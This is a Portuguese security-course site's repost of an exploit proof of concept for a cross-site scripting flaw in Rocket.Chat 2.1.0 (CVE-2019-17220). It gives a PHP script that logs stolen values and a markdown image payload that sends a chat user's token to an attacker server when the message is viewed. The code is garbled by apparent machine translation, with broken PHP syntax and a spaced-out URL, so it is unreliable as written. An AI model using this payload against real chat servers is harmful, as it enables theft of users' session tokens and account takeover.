Valorizamos sua privacidade

Utilizamos cookies para melhorar sua experiência de navegação, exibir anúncios ou conteúdos personalizados e analisar nosso tráfego. Ao clicar em "Aceitar Todos", você concorda com o uso de cookies.

Personalizar Preferências de Consentimento

Utilizamos cookies para ajudá-lo a navegar com eficiência e executar determinadas funções. Você encontrará informações detalhadas sobre todos os cookies em cada categoria de consentimento abaixo.

Os cookies categorizados como "Necessários" são armazenados em seu navegador, pois são essenciais para ativar as funcionalidades básicas do site.... 

Sempre Ativo

Os cookies necessários são essenciais para ativar as funcionalidades básicas deste site, como fornecer login seguro ou ajustar suas preferências de consentimento. Esses cookies não armazenam dados pessoalmente identificáveis.

Nenhum cookie para exibir.

Os cookies funcionais ajudam a executar determinadas funcionalidades, como compartilhar o conteúdo do site em plataformas de mídia social, coletar feedback e outras funcionalidades de terceiros.

Nenhum cookie para exibir.

Os cookies analíticos são usados para entender como os visitantes interagem com o site. Esses cookies ajudam a fornecer informações sobre métricas, como o número de visitantes, taxa de rejeição, fonte de tráfego, entre outros.

Nenhum cookie para exibir.

Os cookies de desempenho são usados para entender e analisar os principais índices de desempenho do site, o que ajuda a oferecer uma melhor experiência de usuário para os visitantes.

Nenhum cookie para exibir.

Os cookies de publicidade são usados para fornecer aos visitantes anúncios personalizados com base nas páginas que você visitou anteriormente e para analisar a eficácia das campanhas publicitárias.

Nenhum cookie para exibir.

Linux Force Security Cursos de linux e segurança da informação
Portal do Aluno

Rocket.Chat 2.1.0 – Cross-Site Scripting

Rocket.Chat 2.1.0 – Cross-Site Scripting

# Title: Rocket.Chat 2.1.0 – Script entre sites
# Autor: 3H34N
# Data: 2019-10-22
# Produto: Rocket.Chat
# Fornecedor: https://rocket.chat/
# Versões vulneráveis: Rocket.Chat <2.1.0
# CVE: CVE-2019-17220
# Agradecimentos especiais: Ali razmjoo, Mohammad Reza Espargham (@rezesp)

# PoC
# 1. Crie l33t.php em um servidor web

<? php
$ output = fopen (“logs.txt”, “a +”) ou die (“WTF? o.O”);
$ leet = $ _GET [‘leet’]. “\ n \ n”;
fwrite ($ output, $ leet);
fclose ($ output);
?>

# 2. Abra uma sessão de bate-papo
# 3. Envie carga útil com o URL do servidor da web

! [title] (http: //10.10.1.5/l33t.php? leet = + `{} token`)

# 4. O token será gravado em logs.txt quando o destino visualizar sua mensagem.

Categorias
Compartilhe esse post

Posts populares

Invista no seu futuro com nossos cursos!

Garanta já a sua vaga.
Linux Force Security Cursos de linux e segurança da informação

Escola especializada em Linux, Segurança da Informação e DevOps. São Paulo – SP

Instagram Facebook X-twitter

Inscreva-se para receber novidades e promoções!

Cursos Linux

Cursos de Segurança

Cursos de DevOps

Institucional

Conteúdos

Fale Conosco

© 2011 – 2025 Linux Force Security – Todos os direitos reservados | Desenvolvido por Cooder Tecnologia